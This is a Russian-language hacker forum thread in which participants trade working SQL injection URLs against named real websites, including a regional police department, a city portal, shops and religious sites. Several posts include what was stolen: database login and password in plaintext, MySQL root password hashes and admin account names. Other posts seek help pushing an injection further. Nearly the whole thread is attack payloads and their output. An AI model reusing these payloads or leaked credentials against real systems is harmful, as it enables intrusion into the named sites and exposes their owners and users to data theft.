SQL Инъекции

стомотология...

Code:

http://www.ctoma.ru/services.phtml?id=-142+union+select+concat(version(),char(58),database(),char(58),user())/*

(см. в <title>5.0.41-log:ctoma:ctoma@localhost)

 

sql inject на дамском клубе
http://www.tdktv.ru/index.php?menu=program&id=- 1+union+select+1,concat(username,char(58),user_password),3+from+phpbb_users+limi
t+1,2
вот данные для коннекта к БД

"dblogin" => "tdktvru_user"
"dbpass" => "markus25let"
"dbhost" => "mysql.nthost.ru"
"dbname" => "tdktvru_common"

 

sql-injection на Департаменте вн.дел Каз. области
http://kostanaypolice.kz/index.php?id=-1)+union+select+1,user(),3+from+relise/*

 

Таблыцы:

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('MODELS','NEWSLETTER','PAGE_groups','pages','payment','address','assets','assets_type','brands','cart','cartitems','category','connector_key','connectors','connectors_b3','connectors_b6','connectors_choir','connectors_e6','connectors_emw','connectors_headset','connectors_isomax2','contactus','downloads','items','pdfs','pdftoproducts','preferences','PREFERENCES_SECURE_STYLES','PREFERENCES_SHIPPING','PREFtoSHIP_SERVICES','PREFtoSHIP_VENDORS','prices','PRODtoCAT','products','promo_codes','SHIPPING_SERVICES','SHIPPING_VENDORS','sysconstraints','syssegments','))--&catid=

ПАЛЯ :Р

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in('Active','Admin','BillingAddressID','CompanyName','EndDate','Name','Password','PrefID','ShippingAddressID','TheDate','UserID','UserName'))--

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%27%2Bcast(name+as+nvarchar)+from+users+where+UserID=1)--v



Остальное влом :Р, спасибо Анатолию за стотью:-Р

 

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%27%2Bcast(name+as+nvarchar)+from+users+where+UserID=1)--v



Остальное влом :Р, спасибо Анатолию за стотью:-Р[/QUOTE]
http://www.countryman.com/store/product.asp?id=1+or+1
тот же самый результат

 

http://www.countryman.com/store/product.asp?id=1+or+1
тот же самый результат[/QUOTE]

Ну звиняй, ссылки на антибоян нету (

 

http://www.novistil.ru/index.php?option=com_zilchcatalog&task=view&id=-3+union+select+1,user(),3,4,5,6,7,8/*
извените если боян

 

http://veta.ru/index.php?act=bench&index=-1+union+select+1,version(),3,user(),5,6/*


MySQL- 4.1.22
user - veta@localhost
db - wwwvetaru


пардон если баян

 

http://www.mastercity.ru/arch/show_content.php?id=74'+union+select+1,2,3,id,5,6,7,8+from+user/*
http://valdis.net.ru/add.php?id=-74+union+select+version(),2,3,4,user(),6,7/*

 

Сайт города Воронеж

Code:

http://www.voronezh.ru/cgi-bin/tv_progr/tv.pl?N&DAY=-5/**/union/**/select/**/1,2,3,concat_ws(char(58),user,password)/**/from/**/mysql.user/*

root : 27f00fce61a0d154
P.S:В антибояне ненашел.

 

Московский Американский центр

Code:

http://www.amc.ru/?section=about&sub=1&newsid=-1+union+select+1,2,3,4,5,6,7,concat(name,0x3a,password),9,10,11,12,13,14,15+from+person/*

Админка: /admin/ правда там басик авторизация =/

 

Официальный сайт ФК ХИМКИ

Code:

http://www.fc-khimki.ru/modules/news/index.php?current_id=1&news_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

Экспресс К - ежедневная общественно-политическая республиканская газета

Code:

http://www.express-k.kz/show_article.php?art_id=9999999999999/**/UNION/**/SELECT/**/1/*

АРХИТЕКТУРНОЕ ПРОЕКТИРОВАНИЕ & ДИЗАЙН ИНТЕРЬЕРА от студии De-Viz :: Проекты дизайна интерьеров проекты домов

Code:

http://www.de-viz.ru/articles_view.php?articles_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4/*

67457e226a1a15bd:root
6f38971106105e69:mysqladmin
10207c3022bdb716:asiadmin
Ислам в Российской Федерации - информационно-аналитический портал

Code:

http://www.islamrf.ru/articles.php?razdel=1&sid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*

Islambasics

Code:

http://islambasics.com/view.php?bkID=9999999999999/**/UNION/**/SELECT/**/1,2/*

Sify.com - India News Portal, Indian Business

Code:

http://sify.com/news/fullstory.php?id=9999999999999+UNION+SELECT+1,2,3/*

موقع الإسلام سؤال وجواب

Code:

http://www.islamqa.com/ln/php/the_file.php?ln=9999999999999'+UNION+SELECT+1,2/*

Всо о Сербии

Code:

http://www.srpska.ru/article.php?nid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/*

Islam Videos

Code:

http://www.watchislam.com/videos/index.php?catid=9999999999999/**/UNION/**/SELECT/**/1/*

Скачать реферат Бесплатные рефераты.

Code:

http://www.referatnik.net/index.php?action=referat&referat=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/*

НОУ "Институт проблем предпринимательства"

Code:

http://www.ippnou.ru/article.php?idarticle=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5/*

БЕЛТИМ - Комплексные системы защиты информации

Code:

http://www.beltim.by/ru/catalog/index.php?catalogid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Code:

http://moresofta.ru/soft.php?n=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11/*

Code:

http://kupi-soft.ru/soft/s1.php?km=2038342808&np=129&l=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

ИТ-решения - Доверенные системы

Code:

http://www.trusted-systems.ru/seminars.php?act=news_by_id&news_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

 

Code:

http://www.kinogildia.ru/pages/page.php?page=-63 union select 1,version(),3,user(),5,6,7,8,9/*

ver4.1.22
user:[email protected]

Code:

http://www.stalkerfest.org/page.php?page=-149 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,15/*

ver=4.1.22

Code:

http://www.americanvegetablegrower.com/veggie_bytes/page.php?page=-news'+union+select+1,2,3,user(),database(),version(),7,8,9/*

user:dbuser@localhost
ver:5.0.24
db:avg_blog

 

http://www.mel-trans.com/

Code:

http://www.mel-trans.com/index.php?pid=0x2d3127%20union+select+1,concat_ws(0x2F,version(),database(),user())/*

4.1.22/meltrans_prom/meltrans_mel@localhost


http://www.megatherm.gr/

Code:

http://www.megatherm.gr/index.php?id=new&new=-1'%20UNION%20ALL%20SELECT%201,2,concat(database(),char(58),user(),char(58),version()),concat(username,0x3e,password),5,6,7,8,9+from+admins/*

megatherm:sfond@localhost:4.1.20


http://portal.kurkino.net.ru/

Code:

http://portal.kurkino.net.ru/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8%20from%20mysql.user/*

root:*5BF54E8CE07B306EE23D5FAF3BEF377843EE65D3 ---> root:*5BF54 E8CE07B306EE23D5FAF3BEF377843EE65D3::12122:


http://hotscriptsonline.com/

Code:

http://hotscriptsonline.com/showcategory.php?cid=0x2d3127%20union+select+1,2,3,4,5/*

4.1.22-standard/clubgcom_espacio/clubgcom_admin@localhost(


bag
ppnou.ru - БОЯН
de-viz.ru - БОЯН
И не надо пожалуйста трогать религиозные сайты.

 

_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805'
3 столбца там вроде
Помогите плз раскрутить...

 

хы странно вроде order by проверяю количество полей 9

http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+order+by+9/*
http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+order+by+10/*

а при http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+union+select+1,2,3,4,5,6,7,8,9/* ошибка

 

версия мускула предположительно == 4
табл 1
посимвольный брут нужен

 

gibson,ZET36
3 ветка union не пашет отсюда и ошибка
_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+and+substring(version(),1,1)=3/*
А вообще вопросы-соседняя тема

 

Йога: кундалини йога, хатха йога, трай йога, медитации, йога для детей, беременных, асана, чакры, мантры

Code:

http://www.kundalini.ru/parts.php?id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4/*

Ниче личного, господа. Просто скуля,а то народ иногда возмущается что мол затрагиваю....

Code:

http://www.bikenut.com.au/parts.php?id=9999999999999/**/UNION/**/SELECT/**/1/*

тот же stox CMS, есть таблица users, дальше не смотрел




============================
Журнал "Наука и религия" Официальный сайт
http://www.n-i-r.ru/nir3.php?id_pdstat=999999999+UNION+SELECT+1,version(),3,4,5/*

Code:

http://melitopol.ru/mel/is.php?n_is=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

5.0.45-Max-log

Code:

http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

 

to bag

Code:

http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(char(58),name,username,password,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users2+limit+0,1/*

Помойму вот так намного лудше Пассы храняться в открытом виде
Старайтесь раскрутить полностью инъекцию а не только подбирать колнки.